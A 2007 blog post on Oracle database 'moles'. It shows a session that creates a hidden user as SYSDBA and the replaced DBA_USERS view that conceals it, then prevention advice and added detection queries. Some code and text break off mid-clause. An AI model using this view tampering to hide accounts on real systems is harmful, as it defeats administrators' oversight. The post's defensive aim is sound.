
Hackers in your Database

Posted by ~Ray @ 2007-11-03 14:04:54


Steve Callan, stevencallan@hotmail.com

Tinker, Tailor, Soldier, Spy comes to mind when the subject of database security comes up. How would you know if there was a mole in your database? A mole in this context refers to a malicious user who has hacked Oracle objects to cover his tracks and, much like the mole in John le Carre's novel, stays hidden from view while causing harm to the system (or other users). Is there a George Smiley we could call upon to root out the mole?

A trusting user of Oracle, DBA or otherwise, probably shouldn't be so trusting. Without extensive checking or safeguards, you really don't know how secure or locked down user access is. How easy is it to spoof the normal checks of an account's privileges? The answer is that it is a lot easier than you think.

An excellent example of creating and then hiding a user was given in a presentation titled "Oracle Rootkits 2.0" at a Black Hat training conference by Alexander Kornbrust of Red Database Security GmbH. The essential part of making this come about is summarized in the code below.

    SQL> conn sys/oracle as sysdba
    Connected.
    SQL> create user hacker identified by hacker;
    User created.
    SQL> select username from dba_users where username = 'HACKER';
    USERNAME
    ---------
    HACKER
    SQL> @cr_user_view
    View created.
    SQL> select username from dba_users where username = 'HACKER';
    no rows selected

The "magic" of this stems from the fact that dba_users is a view, and one of the underlying tables is sys.user$. The "cr_user_view" SQL script is nothing more than the script or source code for the dba_users view (see below) to include an extra clause: where name

    CREATE OR REPLACE VIEW DBA_USERS
      (USERNAME, USER_ID, PASSWORD, ACCOUNT_STATUS, LOCK_DATE, EXPIRY_DATE,
       DEFAULT_TABLESPACE, TEMPORARY_TABLESPACE, CREATED, PROFILE,
       INITIAL_RSRC_CONSUMER_GROUP, EXTERNAL_NAME)
    AS
    select u.name, u.user#, u.password, m.status,
           decode(u.astatus, 4, u.ltime, 5, u.ltime, 6, u.ltime, 8, u.ltime,
                             9, u.ltime, 10, u.ltime, to_date(NULL)),
           decode(u.astatus, 1, u.exptime, 2, u.exptime, 5, u.exptime,
                             6, u.exptime, 9, u.exptime, 10, u.exptime,
                  decode(u.ptime, '', to_date(NULL),
                    decode(pr.limit#, 2147483647, to_date(NULL),
                      decode(pr.limit#, 0,
                        decode(dp.limit#, 2147483647, to_date(NULL),
                               u.ptime + dp.limit#/86400),
                        u.ptime + pr.limit#/86400)))),
           dts.name, tts.name, u.ctime, p.name,
           nvl(cgm.consumer_group, 'DEFAULT_CONSUMER_GROUP'),
           u.ext_username
    from sys.user$ u
         left outer join sys.resource_group_mapping$ cgm
           on (cgm.attribute = 'ORACLE_USER' and cgm.status = 'ACTIVE'
               and cgm.value = u.name),
         sys.ts$ dts, sys.ts$ tts, sys.profname$ p,
         sys.user_astatus_map m, sys.profile$ pr, sys.profile$ dp
    where u.datats# = dts.ts#
      and u.resource$ = p.profile#
      and u.tempts# = tts.ts#
      and u.astatus = m.status#
      and u.type# = 1
      and u.resource$ = pr.profile#
      and dp.profile# = 0
      and dp.type#=1
      and dp.resource#=1
      and pr.type# = 1
      and pr.resource# = 1
      and u.name

Of course the username of HACKER is in the user$ table, but who looks in the "real" tables when virtually the entire public-facing data dictionary avoids the real tables? It shouldn't be any great surprise that if someone goes to the effort (or has the ability and wherewithal) to hide such a user account from commonly used views, the user will certainly have included a "grant dba to hacker" statement as well.

Kornbrust also points out areas/views where a hacker would also want to cover his tracks with regard to processes and jobs. Four data dictionary objects that would be dummied up, so to speak, are v$session, gv_$session, flow_sessions and v_$process.

How would (or could) you prevent a hacker or mole from entering in the first place? Part of the answer lies in limiting access to the SYS schema and auditing logons as SYS. This approach reminds me of cop shows where Internal Affairs Division (IAD) investigators investigate the rank and file police force when allegations of wrongdoing are filed. Who investigates IAD investigators when they are suspected of wrongdoing? Other IAD investigators? So, short of some higher/final authority, there needs to be a level of trust among users with access to SYS (either via logon as SYS or connecting as sysdba via an operating system account). "Trust but verify" is probably a good policy to implement.

Another part of the answer concerns protecting or safeguarding code and objects. How would you even begin to know or guess if someone altered a data dictionary view? In all likelihood, you wouldn't know until after something bad happened. It's hard enough in a development environment to maintain source and version control over known objects and code, so it is not difficult to conceive of how the situation is made more cumbersome when a malicious element is involved.

There are many motives for a mole. In 2002 an employee of a racetrack betting software application made news when he "accessed a company computer after four races were complete.

Related article:
http://askanantha.blogspot.com/2007/09/hackers-in-your-database.html
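A way to check for the tampering described above is to query the base tables directly instead of the views built on them. The queries below are an added example, not code from the article or from Kornbrust's presentation; they assume a SYSDBA connection, and sys.obj$ and sys.sysauth$ (with the columns used here) are dictionary base tables the article itself does not mention.

```sql
-- Added example: run as SYS. Each query reads dictionary base tables,
-- because a replaced view cannot be trusted to report on itself.

-- 1. Accounts present in sys.user$ (type# = 1 means a user, as in the
--    view definition above) that DBA_USERS does not return.
--    Any row here means the view is filtering accounts.
select u.name, u.user#, u.ctime as created
from   sys.user$ u
where  u.type# = 1
and    not exists (select 1
                   from   dba_users d
                   where  d.username = u.name);

-- 2. Holders of the DBA role, read from sys.sysauth$ rather than
--    DBA_ROLE_PRIVS. For role grants, privilege# holds the role's user#.
--    Compare the result with the list of accounts approved to hold DBA.
select g.name as grantee, g.ctime as grantee_created
from   sys.sysauth$ sa
       join sys.user$ g on g.user# = sa.grantee#
       join sys.user$ r on r.user# = sa.privilege#
where  r.name  = 'DBA'
and    r.type# = 0            -- type# = 0 means a role
order  by g.name;

-- 3. Creation and last-DDL times of the SYS views named in the article,
--    read from sys.obj$ (owner# = 0 is SYS, type# = 4 is a view).
--    An mtime that matches no install, patch or upgrade date means the
--    view was redefined and its source should be compared with a
--    known-good copy.
select o.name, o.ctime as created, o.mtime as last_ddl
from   sys.obj$ o
where  o.owner# = 0
and    o.type#  = 4
and    o.name in ('DBA_USERS', 'V_$SESSION', 'GV_$SESSION', 'V_$PROCESS')
order  by o.mtime desc;
```

Running these on a schedule and storing the output outside the database gives a baseline to compare against, since a user with SYS access can alter timestamps or audit data held inside it.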

